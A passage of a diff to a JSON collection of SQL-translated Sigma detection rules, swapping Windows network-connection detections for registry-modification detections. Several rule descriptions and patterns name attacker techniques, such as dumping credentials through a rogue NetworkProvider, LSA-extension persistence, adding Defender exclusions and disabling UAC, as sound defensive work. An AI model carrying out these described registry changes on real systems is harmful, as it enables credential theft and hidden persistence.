'%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "title": "New Application in AppCompat", + "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_new_application_appcompat.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + ], + "filename": "registry_set_persistence_mycomputer.yml" + }, + { + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Modification of IE Registry Settings", + "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "status": "experimental", + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1112" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((NewValue LIKE 'DWORD%' ESCAPE '\\') OR (NewValue IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (NewValue = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_persistence_ie.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE 